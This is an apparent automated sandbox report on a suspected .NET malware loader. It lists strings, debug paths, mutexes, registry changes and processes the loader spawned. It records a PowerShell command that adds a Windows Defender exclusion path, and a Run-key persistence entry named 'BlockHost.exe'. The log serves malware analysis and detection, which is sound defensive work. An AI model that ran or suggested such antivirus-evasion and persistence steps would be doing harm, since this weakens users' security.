Source: 9K25QyJ4hA.exe, 00000000.00000002.2223704058.0000000002BEB000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameloadermode32bit get from pastein.exeb! vs 9K25QyJ4hA.exe
Source: 9K25QyJ4hA.exe, 00000000.00000000.1216864322.00000000006C6000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameloadermode32bit get from pastein.exeb! vs 9K25QyJ4hA.exe
Source: 9K25QyJ4hA.exe, 00000012.00000002.2320518214.0000000002889000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameloadermode32bit get from pastein.exeb! vs 9K25QyJ4hA.exe
Source: 9K25QyJ4hA.exe, 00000018.00000002.2402347273.0000000002D0F000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameloadermode32bit get from pastein.exeb! vs 9K25QyJ4hA.exe
Source: 9K25QyJ4hA.exe | Binary or memory string: OriginalFilenameloadermode32bit get from pastein.exeb! vs 9K25QyJ4hA.exe
Source: classification engine | Classification label: mal72.evad.winEXE@15/26@2/2
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7584:120:WilError_03
Source: C:\Windows\SysWOW64\WerFault.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6780
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7996:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1292:120:WilError_03
Source: C:\Windows\SysWOW64\WerFault.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7964
Source: C:\Windows\SysWOW64\WerFault.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7544
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe | File created: C:\Users\user\AppData\Local\Temp\windowscache.bin
Source: 9K25QyJ4hA.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 9K25QyJ4hA.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a403a0b75e95c07da2caa7f780446a62\mscorlib.ni.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a403a0b75e95c07da2caa7f780446a62\mscorlib.ni.dll
Source: C:\Windows\SysWOW64\WerFault.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a403a0b75e95c07da2caa7f780446a62\mscorlib.ni.dll
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: 9K25QyJ4hA.exe | ReversingLabs: Detection: 29%
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe | File read: C:\Users\user\Desktop\9K25QyJ4hA.exe
Source: unknown | Process created: C:\Users\user\Desktop\9K25QyJ4hA.exe C:\Users\user\Desktop\9K25QyJ4hA.exe
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6780 -s 2440
Source: unknown | Process created: C:\Users\user\Desktop\9K25QyJ4hA.exe "C:\Users\user\Desktop\9K25QyJ4hA.exe"
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7544 -s 2408
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7964 -s 2416
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: 9K25QyJ4hA.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: 9K25QyJ4hA.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: 9K25QyJ4hA.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: 9K25QyJ4hA.exe, 00000000.00000002.2239638441.00000000065AC000.00000004.00000020.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 00000018.00000002.2406232584.00000000067FF000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb3 source: 9K25QyJ4hA.exe, 00000000.00000002.2220357541.0000000000EAB000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: 9K25QyJ4hA.exe, 00000000.00000002.2220357541.0000000000EAB000.00000004.00000020.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 00000012.00000002.2317189482.000000000073B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.pdbN|2h|2 Z|2_CorDllMainmscoree.dll source: 9K25QyJ4hA.exe, 00000000.00000002.2223704058.0000000002BEB000.00000004.00000800.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 00000012.00000002.2320518214.0000000002889000.00000004.00000800.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 00000018.00000002.2402347273.0000000002D0F000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: HPko0C:\Windows\mscorlib.pdb source: 9K25QyJ4hA.exe, 00000000.00000002.2220017054.0000000000AF9000.00000004.00000010.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 00000018.00000002.2398306763.0000000000CF9000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: ?woC:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbT source: 9K25QyJ4hA.exe, 00000000.00000002.2220017054.0000000000AF9000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\loadermode32bit get from pastein.pdbE source: 9K25QyJ4hA.exe, 00000018.00000002.2399283485.0000000000FD0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\mscorlib.pdbX source: 9K25QyJ4hA.exe, 00000012.00000002.2317189482.000000000073B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Net.Http.pdbj source: WERD675.tmp.dmp.32.dr
Source: Binary string: \??\C:\Windows\exe\loadermode32bit get from pastein.pdba source: 9K25QyJ4hA.exe, 00000000.00000002.2239638441.00000000065AC000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\mscorlib.pdbVy source: 9K25QyJ4hA.exe, 00000018.00000002.2399283485.0000000000FFE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\mscorlib.pdbDc source: 9K25QyJ4hA.exe, 00000018.00000002.2399283485.0000000000FFE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: loadermode32bit get from pastein.pdb source: WERD675.tmp.dmp.32.dr, WERB65A.tmp.dmp.23.dr, WER9219.tmp.dmp.7.dr
Source: Binary string: \??\C:\Windows\loadermode32bit get from pastein.pdb6 source: 9K25QyJ4hA.exe, 00000000.00000002.2220357541.0000000000E23000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\Desktop\9K25QyJ4hA.PDB source: 9K25QyJ4hA.exe, 00000012.00000002.2317189482.000000000073B000.00000004.00000020.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 00000018.00000002.2399283485.0000000000FFE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\NEW LIFE\Source\Repos\loadermode32bit get from pastein\loadermode32bit get from pastein\obj\Debug\loadermode32bit get from pastein.pdb P:P ,P_CorExeMainmscoree.dll source: 9K25QyJ4hA.exe
Source: Binary string: ?woC:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbD source: 9K25QyJ4hA.exe, 00000018.00000002.2398306763.0000000000CF9000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: System.Xml.ni.pdbRSDS# source: WERD675.tmp.dmp.32.dr, WERB65A.tmp.dmp.23.dr, WER9219.tmp.dmp.7.dr
Source: Binary string: System.Core.ni.pdb source: WERD675.tmp.dmp.32.dr, WERB65A.tmp.dmp.23.dr, WER9219.tmp.dmp.7.dr
Source: Binary string: \??\C:\Windows\mscorlib.pdb( source: 9K25QyJ4hA.exe, 00000012.00000002.2317189482.000000000073B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdbGs source: 9K25QyJ4hA.exe, 00000018.00000002.2399283485.0000000000FFE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\NEW LIFE\Source\Repos\loadermode32bit get from pastein\loadermode32bit get from pastein\obj\Debug\loadermode32bit get from pastein.pdb source: 9K25QyJ4hA.exe
Source: Binary string: mscorlib.ni.pdb source: WERD675.tmp.dmp.32.dr, WERB65A.tmp.dmp.23.dr, WER9219.tmp.dmp.7.dr
Source: Binary string: \??\C:\Windows\dll\mscorlib.pdbB source: 9K25QyJ4hA.exe, 00000012.00000002.2317189482.000000000073B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\mscorlib.pdb source: 9K25QyJ4hA.exe, 00000000.00000002.2220357541.0000000000EAB000.00000004.00000020.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 00000018.00000002.2399283485.0000000000FFE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\exe\loadermode32bit get from pastein.pdbC source: 9K25QyJ4hA.exe, 00000000.00000002.2239638441.00000000065AC000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\loadermode32bit get from pastein.pdbpdbein.pdb< source: 9K25QyJ4hA.exe, 00000012.00000002.2317189482.000000000073B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdbhh source: 9K25QyJ4hA.exe, 00000012.00000002.2317189482.000000000073B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WERD675.tmp.dmp.32.dr, WERB65A.tmp.dmp.23.dr, WER9219.tmp.dmp.7.dr
Source: Binary string: System.Net.Http.ni.pdbRSDS source: WERD675.tmp.dmp.32.dr, WERB65A.tmp.dmp.23.dr, WER9219.tmp.dmp.7.dr
Source: Binary string: \??\C:\Windows\dll\mscorlib.pdbc source: 9K25QyJ4hA.exe, 00000000.00000002.2220357541.0000000000EAB000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdbcorlib.pdbpdblib.pdbC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: 9K25QyJ4hA.exe, 00000012.00000002.2317122561.00000000006F9000.00000004.00000010.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 00000018.00000002.2398306763.0000000000CF9000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdbm source: 9K25QyJ4hA.exe, 00000012.00000002.2317189482.000000000073B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Xml.ni.pdb source: WERD675.tmp.dmp.32.dr, WERB65A.tmp.dmp.23.dr, WER9219.tmp.dmp.7.dr
Source: Binary string: %%.pdb)s( source: 9K25QyJ4hA.exe, 00000000.00000002.2220017054.0000000000AF9000.00000004.00000010.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 00000012.00000002.2317122561.00000000006F9000.00000004.00000010.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 00000018.00000002.2398306763.0000000000CF9000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdbL} source: 9K25QyJ4hA.exe, 00000012.00000002.2317189482.000000000073B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\exe\loadermode32bit get from pastein.pdb source: 9K25QyJ4hA.exe, 00000012.00000002.2317189482.000000000073B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Net.Http.pdbTzIs source: WERB65A.tmp.dmp.23.dr
Source: Binary string: System.ni.pdbRSDS source: WERD675.tmp.dmp.32.dr, WERB65A.tmp.dmp.23.dr, WER9219.tmp.dmp.7.dr
Source: Binary string: @wo.pdb source: 9K25QyJ4hA.exe, 00000000.00000002.2220017054.0000000000AF9000.00000004.00000010.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 00000012.00000002.2317122561.00000000006F9000.00000004.00000010.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 00000018.00000002.2398306763.0000000000CF9000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: osymbols\dll\mscorlib.pdbLb source: 9K25QyJ4hA.exe, 00000012.00000002.2317122561.00000000006F9000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdbL}ll source: 9K25QyJ4hA.exe, 00000000.00000002.2239638441.00000000065AC000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Configuration.ni.pdb source: WERD675.tmp.dmp.32.dr, WERB65A.tmp.dmp.23.dr, WER9219.tmp.dmp.7.dr
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: 9K25QyJ4hA.exe, 00000012.00000002.2323897269.00000000063B8000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Net.Http.pdb source: WERD675.tmp.dmp.32.dr, WERB65A.tmp.dmp.23.dr, WER9219.tmp.dmp.7.dr
Source: Binary string: mscorlib.ni.pdbRSDS source: WERD675.tmp.dmp.32.dr, WERB65A.tmp.dmp.23.dr, WER9219.tmp.dmp.7.dr
Source: Binary string: System.Core.pdbL0vw# source: WERD675.tmp.dmp.32.dr
Source: Binary string: System.Configuration.pdb source: WERD675.tmp.dmp.32.dr, WERB65A.tmp.dmp.23.dr, WER9219.tmp.dmp.7.dr
Source: Binary string: \??\C:\Windows\System.pdb source: 9K25QyJ4hA.exe, 00000018.00000002.2399283485.0000000000FFE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Xml.pdb source: WERD675.tmp.dmp.32.dr, WERB65A.tmp.dmp.23.dr, WER9219.tmp.dmp.7.dr
Source: Binary string: System.pdb source: 9K25QyJ4hA.exe, 00000000.00000002.2223704058.0000000002BEB000.00000004.00000800.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 00000012.00000002.2320518214.0000000002889000.00000004.00000800.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 00000018.00000002.2402347273.0000000002D0F000.00000004.00000800.00020000.00000000.sdmp, WERD675.tmp.dmp.32.dr, WERB65A.tmp.dmp.23.dr, WER9219.tmp.dmp.7.dr
Source: Binary string: mscorlib.pdbTzIs source: WER9219.tmp.dmp.7.dr
Source: Binary string: \??\C:\Windows\loadermode32bit get from pastein.pdb/ source: 9K25QyJ4hA.exe, 00000018.00000002.2399283485.0000000000FD0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb5y source: 9K25QyJ4hA.exe, 00000018.00000002.2399283485.0000000000FFE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdb source: 9K25QyJ4hA.exe, 00000000.00000002.2223704058.0000000002BEB000.00000004.00000800.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 00000000.00000002.2220017054.0000000000AF9000.00000004.00000010.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 00000012.00000002.2320518214.0000000002889000.00000004.00000800.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 00000012.00000002.2317122561.00000000006F9000.00000004.00000010.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 00000012.00000002.2323897269.00000000063C4000.00000004.00000020.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 00000018.00000002.2402347273.0000000002D0F000.00000004.00000800.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 00000018.00000002.2398306763.0000000000CF9000.00000004.00000010.00020000.00000000.sdmp, WERD675.tmp.dmp.32.dr, WERB65A.tmp.dmp.23.dr, WER9219.tmp.dmp.7.dr
Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: 9K25QyJ4hA.exe, 00000000.00000002.2220357541.0000000000EAB000.00000004.00000020.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 00000012.00000002.2317189482.000000000073B000.00000004.00000020.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 00000018.00000002.2399283485.0000000000FFE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\loadermode32bit get from pastein.pdb) source: 9K25QyJ4hA.exe, 00000012.00000002.2317189482.000000000073B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ein.pdb source: 9K25QyJ4hA.exe, 00000000.00000002.2239638441.00000000065B6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\NEW LIFE\Source\Repos\loadermode32bit get from pastein\loadermode32bit get from pastein\obj\Debug\loadermode32bit get from pastein.pdb P source: 9K25QyJ4hA.exe, 00000000.00000000.1216864322.00000000006C2000.00000002.00000001.01000000.00000003.sdmp
Source: Binary string: System.Net.Http.ni.pdb source: WERD675.tmp.dmp.32.dr, WERB65A.tmp.dmp.23.dr, WER9219.tmp.dmp.7.dr
Source: Binary string: \??\C:\Windows\mscorlib.pdbl source: 9K25QyJ4hA.exe, 00000000.00000002.2220357541.0000000000EAB000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ?woC:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb4 source: 9K25QyJ4hA.exe, 00000012.00000002.2317122561.00000000006F9000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: System.pdbH source: WERD675.tmp.dmp.32.dr
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb source: 9K25QyJ4hA.exe, 00000000.00000002.2220357541.0000000000EAB000.00000004.00000020.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 00000012.00000002.2317189482.000000000073B000.00000004.00000020.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 00000018.00000002.2399283485.0000000000FFE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Core.pdb source: WERD675.tmp.dmp.32.dr, WERB65A.tmp.dmp.23.dr, WER9219.tmp.dmp.7.dr
Source: Binary string: System.pdb4 source: WER9219.tmp.dmp.7.dr
Source: Binary string: symbols\dll\mscorlib.pdbLb source: 9K25QyJ4hA.exe, 00000000.00000002.2220017054.0000000000AF9000.00000004.00000010.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 00000018.00000002.2398306763.0000000000CF9000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: oxg|HPko0C:\Windows\mscorlib.pdb source: 9K25QyJ4hA.exe, 00000012.00000002.2317122561.00000000006F9000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb7 source: 9K25QyJ4hA.exe, 00000012.00000002.2317189482.000000000073B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdbcorlib.pdbpdblib.pdbC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbp source: 9K25QyJ4hA.exe, 00000000.00000002.2220017054.0000000000AF9000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: System.ni.pdb source: WERD675.tmp.dmp.32.dr, WERB65A.tmp.dmp.23.dr, WER9219.tmp.dmp.7.dr
Source: Binary string: System.Core.ni.pdbRSDS source: WERD675.tmp.dmp.32.dr, WERB65A.tmp.dmp.23.dr, WER9219.tmp.dmp.7.dr
Source: 9K25QyJ4hA.exe | Static PE information: 0x95FD26BA [Mon Sep 27 22:48:26 2049 UTC]
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_0498634D push eax; ret 2_2_04986361
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_08A47400 push eax; retf 2_2_08A47401
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run BlockHost.exe
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe | Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe | Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe  Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe  Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\9K25QyJ4hA.exe  Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\9K25QyJ4hA.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\9K25QyJ4hA.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\9K25QyJ4hA.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\9K25QyJ4hA.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\9K25QyJ4hA.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\9K25QyJ4hA.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\9K25QyJ4hA.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\9K25QyJ4hA.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\9K25QyJ4hA.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\9K25QyJ4hA.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\9K25QyJ4hA.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\9K25QyJ4hA.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\9K25QyJ4hA.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\9K25QyJ4hA.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\9K25QyJ4hA.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\9K25QyJ4hA.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\9K25QyJ4hA.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\9K25QyJ4hA.exeProcess information set: NOOPENFILEERRORBOX
